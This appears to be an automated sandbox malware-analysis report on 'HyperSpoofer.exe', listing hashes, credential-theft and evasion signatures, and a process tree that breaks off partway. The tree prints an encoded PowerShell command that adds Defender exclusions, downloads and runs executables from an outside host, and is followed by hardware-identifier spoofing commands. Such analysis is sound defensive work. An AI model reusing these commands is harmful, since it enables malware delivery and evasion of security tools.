Resubmissions

03-08-2024 01:39

240803-b22z2stbpg 10

03-08-2024 01:35

240803-bzp8gatbjb 10

Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-08-2024 01:39

General

  • Target

    HyperSpoofer.exe

  • Size

    2.5MB

  • MD5

    d90e6ad485a94bf54e434b58d3f5ac5c

  • SHA1

    97d3d35fb31c029febce56204d2f6f2753dbd284

  • SHA256

    b55454760356e6ec102c5b3b999488973f8b7baed94eddf9e11be838f0c6901e

  • SHA512

    aabea05a6015a47da10131599ae12ecd41a0f84e49c252ae1ea99e333e233efd1a62619bbd6379d295fdd3e3c8551b10d76021d27e55c56e5592866091caf9c6

  • SSDEEP

    49152:75UzLWWq+T82bgnJslTuOFKtRoQrNRD73g71+20Z5UbRrthRkeq:75xWq+T82qc5QjNJ3sCUdnM

Malware Config

Signatures

  • Process spawned unexpected child process 15 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Detected Nirsoft tools 2 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Enumerates connected drives 3 TTPs 30 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Maps connected drives based on registry 3 TTPs 64 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 30 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 9 IoCs
  • Drops file in Windows directory 3 IoCs
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 46 IoCs
  • Modifies registry class 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 17 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: LoadsDriver 29 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\HyperSpoofer.exe
    "C:\Users\Admin\AppData\Local\Temp\HyperSpoofer.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4740
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAeAB4ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcwB6AGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbABuAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZQBzAGQAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBIAHAAcwByAFMAcABvAG8AZgAuAGUAeABlACcALAAgADwAIwBpAHQAcQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAeAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHoAcgBzACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEgAcABzAHIAUwBwAG8AbwBmAC4AZQB4AGUAJwApACkAPAAjAGUAcABmACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwByAGUAbQBvAHQAZQAvAHMAcABoAHkAcABlAHIAUgB1AG4AdABpAG0AZQBkAGgAYwBwAFMAdgBjAC4AZQB4AGUAJwAsACAAPAAjAGMAdgBkACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbQB2AG0AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAbABtAHIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwBwAGgAeQBwAGUAcgBSAHUAbgB0AGkAbQBlAGQAaABjAHAAUwB2AGMALgBlAHgAZQAnACkAKQA8ACMAYgBkAHMAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBvAG8AawByAGUAYQBkAGkAbgBnADIAMAAyADQALgBuAGUAdAAvAG0ALwBjAG8AbgBoAG8AcwB0AHMAZgB0AC4AZQB4AGUAJwAsACAAPAAjAHoAZwBmACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAaABnAHYAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwBuAGwAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYwBvAG4AaABvAHMAdABzAGYAdAAuAGUAeABlACcAKQApADwAIwBkAGYAegAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAG8AbwBrAHIAZQBhAGQAaQBuAGcAMgAwADIANAAuAG4AZQB0AC8AYwAvAFYAQwBfAHIAZQBkAGkAcwB0AHgANgA0AC4AZQB4AGUAJwAsACAAPAAjAGEAYwBsACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbgBpAHAAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAbgBoAGkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBDAF8AcgBlAGQAaQBzAHQAeAA2ADQALgBlAHgAZQAnACkAKQA8ACMAeABuAG4AIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYgBjAHgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGgAcgBlACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEgAcABzAHIAUwBwAG8AbwBmAC4AZQB4AGUAJwApADwAIwBzAGYAaAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBzAG4AaQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAYQBoAGcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwBwAGgAeQBwAGUAcgBSAHUAbgB0AGkAbQBlAGQAaABjAHAAUwB2AGMALgBlAHgAZQAnACkAPAAjAGUAcgBoACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHQAZgB4ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBsAGYAYgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBjAG8AbgBoAG8AcwB0AHMAZgB0AC4AZQB4AGUAJwApADwAIwBtAG4AZQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB6AGQAbgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAeQBlAG4AIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBDAF8AcgBlAGQAaQBzAHQAeAA2ADQALgBlAHgAZQAnACkAPAAjAHIAcAB6ACMAPgA="
      2⤵
      • Blocklisted process makes network request
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:232
      • C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe
        "C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of WriteProcessMemory
        PID:3420
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 1V0K-Z6P6
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3268
          • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
            C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 1V0K-Z6P6
            5⤵
            • Executes dropped EXE
            PID:1360
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Disk.bat
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3228
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:868
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk drive*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4080
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "C:\"
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2892
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "D:\"
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4984
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "E:\"
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2476
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "F:\"
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4492
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "G:\"
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3756
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk"
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1192
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "disk"
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2808
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk&*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4576
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SWD\WPDBUSENUM*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3784
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "USBSTOR*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4272
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SCSI\Disk*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Drops file in Windows directory
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1732
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "STORAGE*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Drops file in Windows directory
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:692
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2100
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
          4⤵
            PID:2012
            • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
              C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 1052HP-TRGT19160AB
              5⤵
              • Executes dropped EXE
              PID:1860
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
            4⤵
              PID:4540
              • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 21052HP-TRGT19160RV
                5⤵
                • Executes dropped EXE
                PID:4916
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
              4⤵
                PID:4136
                • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 81052HP-TRGT19160SG
                  5⤵
                  • Executes dropped EXE
                  PID:4708
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
                4⤵
                  PID:4816
                  • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                    C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
                    5⤵
                    • Executes dropped EXE
                    PID:3328
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
                  4⤵
                    PID:4036
                    • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                      C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 51056HP-TRGT29908SL
                      5⤵
                      • Executes dropped EXE
                      PID:4008
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
                    4⤵
                      PID:2684
                      • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 41056HP-TRGT29908FA
                        5⤵
                        • Executes dropped EXE
                        PID:1916
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
                      4⤵
                        PID:3792
                        • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                          C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 61056HP-TRGT29908FU
                          5⤵
                          • Executes dropped EXE
                          PID:2952
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
                        4⤵
                          PID:4356
                          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 31059HP-TRGT7888DQ
                            5⤵
                            • Executes dropped EXE
                            PID:3540
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
                          4⤵
                            PID:1232
                            • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                              C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 71059HP-TRGT7888MST
                              5⤵
                              • Executes dropped EXE
                              PID:1456
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
                            4⤵
                              PID:1052
                              • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
                                5⤵
                                • Executes dropped EXE
                                PID:3972
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
                              4⤵
                                PID:1456
                                • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 1075HP-TRGT28862AB
                                  5⤵
                                  • Executes dropped EXE
                                  PID:2864
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
                                4⤵
                                  PID:2132
                                  • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                    C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 21075HP-TRGT28862RV
                                    5⤵
                                    • Executes dropped EXE
                                    PID:2228
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
                                  4⤵
                                    PID:3976
                                    • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                      C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 81075HP-TRGT28862SG
                                      5⤵
                                      • Executes dropped EXE
                                      PID:1552
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
                                    4⤵
                                      PID:2904
                                      • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
                                        5⤵
                                        • Executes dropped EXE
                                        PID:4072
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
                                      4⤵
                                        PID:2984
                                        • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                          C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 51079HP-TRGT6843SL
                                          5⤵
                                          • Executes dropped EXE
                                          PID:4136
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
                                        4⤵
                                          PID:4616
                                          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 41079HP-TRGT6843FA
                                            5⤵
                                            • Executes dropped EXE
                                            PID:2020
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
                                          4⤵
                                            PID:4740
                                            • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                              C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 61079HP-TRGT6843FU
                                              5⤵
                                              • Executes dropped EXE
                                              PID:1492
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
                                            4⤵
                                              PID:4124
                                              • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 31079HP-TRGT6843DQ
                                                5⤵
                                                • Executes dropped EXE
                                                PID:2632
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
                                              4⤵
                                                PID:4108
                                                • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 71079HP-TRGT6843MST
                                                  5⤵
                                                  • Executes dropped EXE
                                                  PID:4068
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
                                                4⤵
                                                  PID:4164
                                                  • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                    C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
                                                    5⤵
                                                    • Executes dropped EXE
                                                    PID:1540
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
                                                  4⤵
                                                    PID:3872
                                                    • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                      C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 1095HP-TRGT27817AB
                                                      5⤵
                                                      • Executes dropped EXE
                                                      PID:1016
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
                                                    4⤵
                                                      PID:4272
                                                      • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 21095HP-TRGT27817RV
                                                        5⤵
                                                        • Executes dropped EXE
                                                        PID:3924
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
                                                      4⤵
                                                        PID:3316
                                                        • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                          C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 81095HP-TRGT27817SG
                                                          5⤵
                                                          • Executes dropped EXE
                                                          PID:3336
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
                                                        4⤵
                                                          PID:4388
                                                          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
                                                            5⤵
                                                            • Executes dropped EXE
                                                            PID:5052
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
                                                          4⤵
                                                            PID:2028
                                                            • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                              C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 51095HP-TRGT27817SL
                                                              5⤵
                                                              • Executes dropped EXE
                                                              PID:4996
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
                                                            4⤵
                                                              PID:4896
                                                              • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 41095HP-TRGT27817FA
                                                                5⤵
                                                                • Executes dropped EXE
                                                                PID:4904
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
